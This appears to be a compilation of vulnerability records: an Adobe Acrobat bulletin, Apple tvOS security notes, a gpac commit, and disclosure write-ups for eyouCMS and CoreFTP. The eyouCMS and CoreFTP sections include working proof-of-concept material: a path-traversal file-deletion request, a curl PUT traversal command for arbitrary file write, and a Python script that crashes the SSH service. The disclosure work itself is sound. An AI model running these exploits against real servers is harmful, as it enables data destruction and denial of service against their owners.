Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Security update available for Adobe Acrobat and Reader  | APSB22-01

**Bulletin ID**

**Date Published**

**Priority**

APSB22-01

January 11, 2022

2

**Summary**

Adobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address  multiple critical, important and moderate vulnerabilities. Successful exploitation could lead to arbitrary code execution, memory leak, application denial of service,  security feature bypass and privilege escalation. 

**Affected Versions**

**Product**

**Track**

**Affected Versions**

**Platform**

Acrobat DC 

Continuous 

21.007.20099 and earlier versions  

Windows

Acrobat Reader DC

Continuous 

21.007.20099 and earlier versions

Windows

Acrobat DC 

Continuous 

21.007.20099 and earlier versions

macOS

Acrobat Reader DC

Continuous 

21.007.20099 and earlier versions

macOS

Acrobat 2020  

Classic 2020             

20.004.30017 and earlier versions  

Windows & macOS  

Acrobat Reader 2020  

Classic 2020             

20.004.30017 and earlier versions   

Windows & macOS  

Acrobat 2017

Classic 2017

17.011.30204  and earlier versions            

Windows & macOS  

Acrobat Reader 2017

Classic 2017

17.011.30204  and earlier versions        

Windows & macOS  

For questions regarding Acrobat DC, please visit the Acrobat DC FAQ page. 

**Solution**

Adobe recommends users update their software installations to the latest versions by following the instructions below.    

The latest product versions are available to end users via one of the following methods:    

*   Users can update their product installations manually by choosing Help > Check for Updates.     
    
*   The products will update automatically, without requiring user intervention, when updates are detected.      
    
*   The full Acrobat Reader installer can be downloaded from the Acrobat Reader Download Center.     
    

For IT administrators (managed environments):     

*   Refer to the specific release note version for links to installers.     
    
*   Install updates via your preferred methodology, such as AIP-GPO, bootstrapper, SCUP/SCCM (Windows), or on macOS, Apple Remote Desktop and SSH.     
    

Adobe categorizes these updates with the following priority ratings and recommends users update their installation to the newest version:    

**Product**

**Track**

**Updated Versions**

**Platform**

**Priority Rating**

**Availability**

Acrobat DC

Continuous

21.011.20039  

Windows and macOS

2

Release Notes     

Acrobat Reader DC

Continuous

21.011.20039  

Windows and macOS

2

Release Notes     

Acrobat 2020  

Classic 2020             

20.004.30020  

Windows and macOS       

2

Release Notes     

Acrobat Reader 2020  

Classic 2020             

20.004.30020  

Windows and macOS       

2

Release Notes     

Acrobat 2017

Classic 2017

17.011.30207  

Windows and macOS

2

Release Notes     

Acrobat Reader 2017

Classic 2017

17.011.30207  

Windows and macOS

2

Release Notes     

**Vulnerability Details**

**Vulnerability Category**

**Vulnerability Impact**

**Severity**

**CVSS base score**

CVSS vector

**CVE Number**

Use After Free (CWE-416)

Arbitrary code execution 

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44701

Information Exposure (CWE-200)  

Privilege escalation

Moderate

3.1

CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N  

CVE-2021-44702

Stack-based Buffer Overflow (CWE-121)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44703

Use After Free (CWE-416)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44704

Access of Uninitialized Pointer (CWE-824)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44705

Use After Free (CWE-416)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44706

Out-of-bounds Write (CWE-787)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44707

Heap-based Buffer Overflow (CWE-122)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44708

Heap-based Buffer Overflow (CWE-122)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44709

Use After Free (CWE-416)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44710

Integer Overflow or Wraparound (CWE-190)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44711

Improper Input Validation (CWE-20)

Application denial-of-service

Important

4.4

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L

CVE-2021-44712

Use After Free (CWE-416)

Application denial-of-service

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

CVE-2021-44713

Violation of Secure Design Principles (CWE-657)

Security feature bypass

Moderate

2.5

CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N

CVE-2021-44714

Out-of-bounds Read (CWE-125)

Memory Leak

Moderate

3.3

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

CVE-2021-44715

Information Exposure (CWE-200)  

Privilege escalation  

Moderate

3.1

CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N  

CVE-2021-44739

NULL Pointer Dereference (CWE-476)

Application denial-of-service

Moderate

3.3

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

CVE-2021-44740

NULL Pointer Dereference (CWE-476)

Application denial-of-service

Moderate

3.3

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

CVE-2021-44741

Out-of-bounds Read (CWE-125)

Memory Leak

Moderate

3.3

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

CVE-2021-44742

Out-of-bounds Read (CWE-125)

Arbitrary code execution

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-45060

Out-of-bounds Write (CWE-787)

Arbitrary code execution

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-45061

Use After Free (CWE-416)

Arbitrary code execution

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-45062

Use After Free (CWE-416)

Privilege escalation

Moderate

3.3

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

CVE-2021-45063

Use After Free (CWE-416)

Arbitrary code execution

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-45064

Access of Memory Location After End of Buffer (CWE-788)

Memory Leak

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

CVE-2021-45067

Out-of-bounds Write (CWE-787)

Arbitrary code execution

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-45068

**Acknowledgements**

Adobe would like to thank the following for reporting these issues and for working with Adobe to help protect our customers:   

*   Ashfaq Ansari and Krishnakant Patil - HackSys Inc working with Trend Micro Zero Day Initiative (CVE-2021-44701)
*   j00sean (j00sean) (CVE-2021-44702, CVE-2021-44739)
*   Kai Lu of Zscaler's ThreatLabz (CVE-2021-44703, CVE-2021-44708, CVE-2021-44709, CVE-2021-44740, CVE-2021-44741)
*   PangU via TianfuCup (CVE-2021-44704)
*   StakLeader via TianfuCup (CVE-2021-44705)
*   bee13oy of Kunlun Lab via TianfuCup (CVE-2021-44706)
*   Vulnerability Research Institute Juvenile Via TianfuCup (CVE-2021-44707)
*   Jaewon Min and Aleksandar Nikolic of Cisco Talos (CVE-2021-44710, CVE-2021-44711)
*   Sanjeev Das (sd001) (CVE-2021-44712)  
    
*   Rocco Calvi (TecR0c) and Steven Seeley of Qihoo 360 (CVE-2021-44713, CVE-2021-44715)
*   chamal (chamal) (CVE-2021-44714)
*   fr0zenrain of Baidu Security (fr0zenrain) (CVE-2021-44742)  
    
*   Anonymous working with Trend Micro Zero Day Initiative (CVE-2021-45060, CVE-2021-45061, CVE-2021-45062, CVE-2021-45063; CVE-2021-45068, CVE-2021-45064)
*   Ashfaq Ansari (ashfaqansari) (CVE-2021-45067)

**Revisions:**

January 12, 2022: Updated acknowledgement for CVE-2021-44706

January 13, 2022: Updated acknowledgement for CVE-2021-45064, Updated CVE details for CVE-2021-44702 and CVE-2021-44739

January 17, 2022: Updated acknowledgement for CVE-2021-44706

For more information, visit https://helpx.adobe.com/security.html, or email PSIRT@adobe.com.

CVE-2021-45061: Adobe Security Bulletin

eyouCMS V1.5.5-UTF8-SP3_1 suffers from Arbitrary file deletion due to insufficient filtering of the parameter filename.

#Author: yukidddd

#Submit date: 07/01/2022  
#Target: https://www.eyoucms.com/  
#Version: V1.5.5-UTF8-SP3\_1 (https://www.eyoucms.com/index.php?m=home&c=Index&a=downdemo)  
#Description:Due to insufficient filtering of the parameter filename, it can cause any file to be deleted  
#PoC:

![WJLsZRc49SQfyYD](https://user-images.githubusercontent.com/17507734/148497117-c7204d08-5c3d-4202-9ff4-86e66ab574f9.png)

1.  Now,content of the root folder of the website is like this,and we created a new test.txt as a test

![image](https://user-images.githubusercontent.com/17507734/148497182-d58b930b-0dc3-45fe-8723-d27760a3490d.png)

2.  Then we log in as a normal user and send the following payload

![image](https://user-images.githubusercontent.com/17507734/148497235-803f9dd3-8594-4a40-bc05-18be8077bbbd.png)

###Request:
GET /index.php?m=user&c=Uploadify&a=del\_local&filenames=/uploads/....//test.txt HTTP/1.1
Host: localhost
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96"
Accept: application/json, text/javascript, \*/\*; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/?m=user&c=Users&a=index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: cookie\_token=b524f68dde14d175a5a29af375704b7361e80aeacf0acedac77a3b397a4a56e9; admin=admin; pass=21232f297a57a5a743894a0e4a801fc3; UserName=test; PassWord=098f6bcd4621d373cade4e832627b4f6; home\_lang=cn; admin\_lang=cn; PHPSESSID=t0kq7ujoc9351sj4vl251ra20s; referurl=http%3A%2F%2Flocalhost%2F; users\_id=4
Connection: close

###Response:
HTTP/1.1 200 OK
Server: nginx/1.15.11
Date: Fri, 07 Jan 2022 05:28:07 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/7.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
Set-Cookie: site\_info=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: users\_id=4; path=/
Content-Length: 4

true

3.  And now,the test.txt file has been deleted

![image](https://user-images.githubusercontent.com/17507734/148497286-49d3ad10-3d93-4dcc-9d6a-37d8aa3709a0.png)

CVE-2021-46255: There is an arbitrary file deletion vulnerability in your code · Issue #21 · eyoucms/eyoucms

The binary MP4Box in Gpac 1.0.1 has a double-free vulnerability in the ilst_box_read function in box_code_apple.c, which allows attackers to cause a denial of service, even code execution and escalation of privileges.

Permalink

Browse files

fixed #1895

*   Loading branch information

![@jeanlf](https://avatars.githubusercontent.com/u/7303785?s=40&v=4)

jeanlf committed

Aug 30, 2021

1 parent 86c1566 commit a69b567b8c95c72f9560c873c5ab348be058f340

Showing with **1 addition** and **0 deletions**.

1.  +1 −0 src/odf/descriptors.c

1 src/odf/descriptors.c

Show comments View file

@@ -1613,6 +1613,7 @@ GF\_AV1Config \*gf\_odf\_av1\_cfg\_read\_bs\_size(GF\_BitStream \*bs, u32 size)

size -= (u32) obu\_size;

}

gf\_av1\_reset\_state(& state, GF\_TRUE);

gf\_bs\_align(bs);

return cfg;

#else

return NULL;

**0 comments on commit `a69b567`**

Please sign in to comment.

CVE-2021-40571: fixed #1895 · gpac/gpac@a69b567

CoreFTP Server before 727 allows directory traversal (for file creation) by an authenticated attacker via ../ in an HTTP PUT request.

![](https://yoursecuritybores.me/content/images/2022/01/CoreFTP-setup-1.png)

**Overview**

The following was found on Core FTP/SFTP Server v2 - Build 725 (64-bit). The following vulnerabilities can be exploited remotely, however one  requires authentication. Although, if anonymous logon is enabled then exploitation of this would be considered unauthenticated. Shodan clocked in ~2,000 publicly available servers. A patch has been released and you can check on their forums to see that the new build version is 727!

![](https://yoursecuritybores.me/content/images/2022/01/image.png)

**Proof of Concept - Arbitrary File Write (HTTPS)**

The application has several different options, so I tried to make it as "real world" as possible. The following was the least amount of access I could set permission. This being that the users home directory is locked to `C:\Temp` locally.

![](https://yoursecuritybores.me/content/images/2021/12/lock.PNG)

Permissions set on the home directory is given access to read and list.

![](https://yoursecuritybores.me/content/images/2021/12/perms.PNG)

With the server started up, an authenticated user can upload files through the HTTPS service with basic authentication. The normal use case for an HTTP file upload is a `POST` request with basic `WebKitFormBoundary` with the file data. Example below;

    POST /?T HTTP/1.1
    Host: 192.168.171.138
    Content-Length: 218
    Cache-Control: max-age=0
    Authorization: Basic am9lOmpvZQ==
    Upgrade-Insecure-Requests: 1
    Origin: https://192.168.171.138
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiULcJSomxAyFsnjd
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: https://192.168.171.138/
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    ------WebKitFormBoundaryiULcJSomxAyFsnjd
    Content-Disposition: form-data; name="uploadfile"; filename="random.dat"
    Content-Type: application/octet-stream
    
    Random Data 
    
    ------WebKitFormBoundaryiULcJSomxAyFsnjd--
    

To exploit this vulnerability, escape from the permission lock simply using a `PUT` HTTP verb with a `../` escape sequence. The following `curl` command will successfully bypass the lock permissions;

    curl -k -X PUT -H "Host: <IP>" --basic -u <username>:<password> --data-binary "PoC." --path-as-is https://<IP>/../../../../../../whoops
    

More readable format;

    PUT /../whoops HTTP/1.1
    Host: 192.168.171.138
    Content-Length: 4
    Cache-Control: max-age=0
    Authorization: Basic am9lOmpvZQ==
    Upgrade-Insecure-Requests: 1
    Origin: https://192.168.171.138
    Referer: https://192.168.171.138/
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    PoC.
    

Notice that the file has been placed outside the locked permission set.

**Proof of Concept - Remote DoS (SSH)**

The next vulnerability was an overflow in the implementation of the SSH Service. During the secure algorithm negotiation, if the client provides an oversized second step, the application will crash.

    import socket
    import codecs
    packet1 = (
    b"\x53\x53\x48\x2d\x32\x2e\x30\x2d\x4e\x6d\x61\x70\x2d\x53\x53\x48"
    b"\x32\x2d\x48\x6f\x73\x74\x6b\x65\x79\x0d\x0a")
    packet2 = (
    b"\x00\x00\x02\x04\x08\x14\xeb\xcd\xde\x26\x3d\x8d\x72\xd2\x0b\xdb"
    b"\xea\x31\x95\x00\x99\x36\x00\x00\x00\xba\x64\x69\x66\x66\x69\x65"
    b"\x2d\x68\x65\x6c\x6c\x6d\x61\x6e\x2d\x67\x72\x6f\x75\x70\x31\x2d"
    b"\x73\x68\x61\x31\x2c\x64\x69\x66\x66\x69\x65\x2d\x68\x65\x6c\x6c"
    b"\x6d\x61\x6e\x2d\x67\x72\x6f\x75\x70\x31\x34\x2d\x73\x68\x61\x31"
    b"\x2c\x64\x69\x66\x66\x69\x65\x2d\x68\x65\x6c\x6c\x6d\x61\x6e\x2d"
    b"\x67\x72\x6f\x75\x70\x31\x34\x2d\x73\x68\x61\x32\x35\x36\x2c\x64"
    b"\x69\x66\x66\x69\x65\x2d\x68\x65\x6c\x6c\x6d\x61\x6e\x2d\x67\x72"
    b"\x6f\x75\x70\x31\x36\x2d\x73\x68\x61\x35\x31\x32\x2c\x64\x69\x66"
    b"\x66\x69\x65\x2d\x68\x65\x6c\x6c\x6d\x61\x6e\x2d\x67\x72\x6f\x75"
    b"\x70\x2d\x65\x78\x63\x68\x61\x6e\x67\x65\x2d\x73\x68\x61\x31\x2c"
    b"\x64\x69\x66\x66\x69\x65\x2d\x68\x65\x6c\x6c\x6d\x61\x6e\x2d\x67"
    b"\x72\x6f\x75\x70\x2d\x65\x78\x63\x68\x61\x6e\x67\x65\x2d\x73\x68"
    b"\x61\x32\x35\x36\x00\x00\x00\x0b\x73\x73\x68\x2d\x65\x64\x32\x35"
    b"\x35\x31\x39\x00\x00\x00\x57\x61\x65\x73\x31\x32\x38\x2d\x63\x62"
    b"\x63\x2c\x33\x64\x65\x73\x2d\x63\x62\x63\x2c\x62\x6c\x6f\x77\x66"
    b"\x69\x73\x68\x2d\x63\x62\x63\x2c\x61\x65\x73\x31\x39\x32\x2d\x63"
    b"\x62\x63\x2c\x61\x65\x73\x32\x35\x36\x2d\x63\x62\x63\x2c\x61\x65"
    b"\x73\x31\x32\x38\x2d\x63\x74\x72\x2c\x61\x65\x73\x31\x39\x32\x2d"
    b"\x63\x74\x72\x2c\x61\x65\x73\x32\x35\x36\x2d\x63\x74\x72\x00\x00"
    b"\x00\x57\x61\x65\x73\x31\x32\x38\x2d\x63\x62\x63\x2c\x33\x64\x65"
    b"\x73\x2d\x63\x62\x63\x2c\x62\x6c\x6f\x77\x66\x69\x73\x68\x2d\x63"
    b"\x62\x63\x2c\x61\x65\x73\x31\x39\x32\x2d\x63\x62\x63\x2c\x61\x65"
    b"\x73\x32\x35\x36\x2d\x63\x62\x63\x2c\x61\x65\x73\x31\x32\x38\x2d"
    b"\x63\x74\x72\x2c\x61\x65\x73\x31\x39\x32\x2d\x63\x74\x72\x2c\x61"
    b"\x65\x73\x32\x35\x36\x2d\x63\x74\x72\x00\x00\x00\x21\x68\x6d\x61"
    b"\x63\x2d\x6d\x64\x35\x2c\x68\x6d\x61\x63\x2d\x73\x68\x61\x31\x2c"
    b"\x68\x6d\x61\x63\x2d\x72\x69\x70\x65\x6d\x64\x31\x36\x30\x00\x00"
    b"\x00\x21\x68\x6d\x61\x63\x2d\x6d\x64\x35\x2c\x68\x6d\x61\x63\x2d"
    b"\x73\x68\x61\x31\x2c\x68\x6d\x61\x63\x2d\x72\x69\x70\x65\x6d\x64"
    b"\x31\x36\x30\x00\x00\x00\x04\x6e\x6f\x6e\x65\x00\x00\x00\x04\x6e"
    b"\x6f\x6e\x65\x00\x00\x00\x00\x00\x41\x41\x41\x41\x41\x41\x41\x41"
    b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    b"\x41\x41\x41\x41\x41\x41\x41\x41")
    host = ''
    port = 22
    mySocket = socket.socket()
    mySocket.connect((host,port))
    mySocket.send(packet1)
    data = codecs.decode(mySocket.recv(1024))
    print ('Received from server: ' + data)
    mySocket.send(packet2)
    print ('You\'re sending: '+ packet2)
    data = mySocket.recv(1024)
    print ('Received from server: ' + data)
    

Results in the following stack overflow;

![](https://yoursecuritybores.me/content/images/2022/01/overflow.PNG)

**TLDR / Takeaways;**

Some key takeaways and conclusions. First off, CoreFTP team was extremely fast at replying and patching these vulnerabilities and you can update your application so that you're not vulnerable. One thing I noticed after reporting these, CoreFTP seems to have a common theme of DoS vulnerabilities within the TLS implementation for their application, I thought that was kind of interesting.

Secondly, the DoS vulnerability was a pretty short PoC as I just didn't have the time to find the root cause of the vulnerability/ identify the exact point of source code that lead to this. This was a closed boxed research project and the code base is HUGE, trying to reverse it statically was daunting to say the least.

Lastly, this was fun to research, I got to learn about `boofuzz`, and statically reverse with `Binary Ninja Pro`, finally debugged with `WinDBG`. CVE ID's are reported, will update when assigned.

    December 28th, 2021 - Initial Email
    December 29th, 2021 - Response
    Janurary 5th, 2022 - Patched

CVE-2022-22836: CoreFTP Arbitrary File Write(CVE-2022-22836) and Remote DoS

In NetBSD through 9.2, the IPv6 Flow Label generation algorithm employs a weak cryptographic PRNG.

CVE-2021-45489

A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS High Sierra 10.13. An application may be able to execute arbitrary code with elevated privileges.

CVE-2017-13835: About the security content of macOS High Sierra 10.13

This issue was addressed with a new entitlement. This issue is fixed in macOS Mojave 10.14.6, Security Update 2019-004 High Sierra, Security Update 2019-004 Sierra, iOS 12.4, tvOS 12.4. A local user may be able to read a persistent account identifier.

Released July 22, 2019

**Bluetooth**

Available for: Apple TV 4K and Apple TV HD

Impact: An attacker in a privileged network position may be able to intercept Bluetooth traffic (Key Negotiation of Bluetooth - KNOB)

Description: An input validation issue existed in Bluetooth. This issue was addressed with improved input validation.

CVE-2019-9506: Daniele Antonioli of SUTD, Singapore, Dr. Nils Ole Tippenhauer of CISPA, Germany, and Prof. Kasper Rasmussen of University of Oxford, England

The changes for this issue mitigate CVE-2020-10135.

Entry added August 13, 2019, updated June 25, 2020

**Core Data**

Available for: Apple TV 4K and Apple TV HD

Impact: A remote attacker may be able to leak memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2019-8646: natashenka of Google Project Zero

**Core Data**

Available for: Apple TV 4K and Apple TV HD

Impact: A remote attacker may be able to cause arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

CVE-2019-8647: Samuel Groß and natashenka of Google Project Zero

**Core Data**

Available for: Apple TV 4K and Apple TV HD

Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

CVE-2019-8660: Samuel Groß and natashenka of Google Project Zero

**Game Center**

Available for: Apple TV 4K and Apple TV HD

Impact: A local user may be able to read a persistent account identifier

Description: This issue was addressed with a new entitlement.

CVE-2019-8702: Min (Spark) Zheng and Xiaolong Bai of Alibaba Inc.

Entry added February 24, 2020

**Heimdal**

Available for: Apple TV 4K and Apple TV HD

Impact: An issue existed in Samba that may allow attackers to perform unauthorized actions by intercepting communications between services

Description: This issue was addressed with improved checks to prevent unauthorized actions.

CVE-2018-16860: Isaac Boukris and Andrew Bartlett of the Samba Team and Catalyst

**Image Processing**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing a maliciously crafted image may lead to a denial of service

Description: A denial of service issue was addressed with improved validation.

CVE-2019-8668: an anonymous researcher

Entry added October 8, 2019

**libxslt**

Available for: Apple TV 4K and Apple TV HD

Impact: A remote attacker may be able to view sensitive information

Description: A stack overflow was addressed with improved input validation.

CVE-2019-13118: found by OSS-Fuzz

**Profiles**

Available for: Apple TV 4K and Apple TV HD

Impact: A malicious application may be able to restrict access to websites

Description: A validation issue existed in the entitlement verification. This issue was addressed with improved validation of the process entitlement.

CVE-2019-8698: Luke Deshotels, Jordan Beichler, and William Enck of North Carolina State University; Costin Carabaș and Răzvan Deaconescu of University POLITEHNICA of Bucharest

**Quick Look**

Available for: Apple TV 4K and Apple TV HD

Impact: An attacker may be able to trigger a use-after-free in an application deserializing an untrusted NSDictionary

Description: This issue was addressed with improved checks.

CVE-2019-8662: natashenka and Samuel Groß of Google Project Zero

**Siri**

Available for: Apple TV 4K and Apple TV HD

Impact: A remote attacker may be able to leak memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2019-8646: natashenka of Google Project Zero

**UIFoundation**

Available for: Apple TV 4K and Apple TV HD

Impact: Parsing a maliciously crafted office document may lead to an unexpected application termination or arbitrary code execution

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2019-8657: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative

**WebKit**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing maliciously crafted web content may lead to universal cross site scripting

Description: A logic issue existed in the handling of document loads. This issue was addressed with improved state management.

CVE-2019-8690: Sergei Glazunov of Google Project Zero

**WebKit**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing maliciously crafted web content may lead to universal cross site scripting

Description: A logic issue existed in the handling of synchronous page loads. This issue was addressed with improved state management.

CVE-2019-8649: Sergei Glazunov of Google Project Zero

**WebKit**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing maliciously crafted web content may lead to universal cross site scripting

Description: A logic issue was addressed with improved state management.

CVE-2019-8658: akayn working with Trend Micro's Zero Day Initiative

**WebKit**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8644: G. Geshev working with Trend Micro's Zero Day Initiative

CVE-2019-8666: Zongming Wang (王宗明) and Zhe Jin (金哲) from Chengdu Security Response Center of Qihoo 360 Technology Co. Ltd.

CVE-2019-8669: akayn working with Trend Micro's Zero Day Initiative

CVE-2019-8671: Apple

CVE-2019-8672: Samuel Groß of Google Project Zero

CVE-2019-8673: Soyeon Park and Wen Xu of SSLab at Georgia Tech

CVE-2019-8676: Soyeon Park and Wen Xu of SSLab at Georgia Tech

CVE-2019-8677: Jihui Lu of Tencent KeenLab

CVE-2019-8678: Anthony Lai (@darkfloyd1014) of Knownsec, Ken Wong (@wwkenwong) of VXRL, Jeonghoon Shin (@singi21a) of Theori, Johnny Yu (@straight\_blast) of VX Browser Exploitation Group, Chris Chan (@dr4g0nfl4me) of VX Browser Exploitation Group, Phil Mok (@shadyhamsters) of VX Browser Exploitation Group, Alan Ho (@alan\_h0) of Knownsec, Byron Wai of VX Browser Exploitation, P1umer of ADLab of Venustech

CVE-2019-8679: Jihui Lu of Tencent KeenLab

CVE-2019-8680: Jihui Lu of Tencent KeenLab

CVE-2019-8681: G. Geshev working with Trend Micro Zero Day Initiative

CVE-2019-8683: lokihardt of Google Project Zero

CVE-2019-8684: lokihardt of Google Project Zero

CVE-2019-8685: akayn, Dongzhuo Zhao working with ADLab of Venustech, Ken Wong (@wwkenwong) of VXRL, Anthony Lai (@darkfloyd1014) of VXRL, and Eric Lung (@Khlung1) of VXRL

CVE-2019-8686: G. Geshev working with Trend Micro's Zero Day Initiative

CVE-2019-8687: Apple

CVE-2019-8688: Insu Yun of SSLab at Georgia Tech

CVE-2019-8689: lokihardt of Google Project Zero

Entry updated September 11, 2019

CVE-2019-8702: About the security content of tvOS 12.4

This issue was addressed with improved entitlements. This issue is fixed in watchOS 6, tvOS 13, macOS Catalina 10.15, iOS 13. An application may be able to gain elevated privileges.

Released September 24, 2019

**AppleFirmwareUpdateKext**

Available for: Apple TV 4K and Apple TV HD

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption vulnerability was addressed with improved locking.

CVE-2019-8747: Mohamed Ghannam (@\_simo36)

Entry added October 29, 2019

**Audio**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing a maliciously crafted audio file may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved state management.

CVE-2019-8706: Yu Zhou of Ant-Financial Light-Year Security Lab

Entry added October 29, 2019

**Audio**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing a maliciously crafted audio file may disclose restricted memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2019-8850: Anonymous working with Trend Micro Zero Day Initiative

Entry added December 4, 2019

**CFNetwork**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing maliciously crafted web content may lead to a cross site scripting attack

Description: This issue was addressed with improved checks.

CVE-2019-8753: Łukasz Pilorz of Standard Chartered GBS Poland

Entry added October 29, 2019

**CoreAudio**

Available for: Apple TV 4K and Apple TV HD

Impact: Playing a malicious audio file may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

CVE-2019-8592: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative

Entry added November 6, 2019

**CoreCrypto**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing a large input may lead to a denial of service

Description: A denial of service issue was addressed with improved input validation.

CVE-2019-8741: Nicky Mouha of NIST

Entry added October 29, 2019

**CoreAudio**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing a maliciously crafted movie may result in the disclosure of process memory

Description: A memory corruption issue was addressed with improved validation.

CVE-2019-8705: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative

Entry added October 8, 2019

**Foundation**

Available for: Apple TV 4K and Apple TV HD

Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2019-8746: natashenka and Samuel Groß of Google Project Zero

Entry added October 29, 2019

**IOUSBDeviceFamily**

Available for: Apple TV 4K and Apple TV HD

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2019-8718: Joshua Hill and Sem Voigtländer

Entry added October 29, 2019

**Kernel**

Available for: Apple TV 4K and Apple TV HD

Impact: An application may be able to gain elevated privileges

Description: This issue was addressed with improved entitlements.

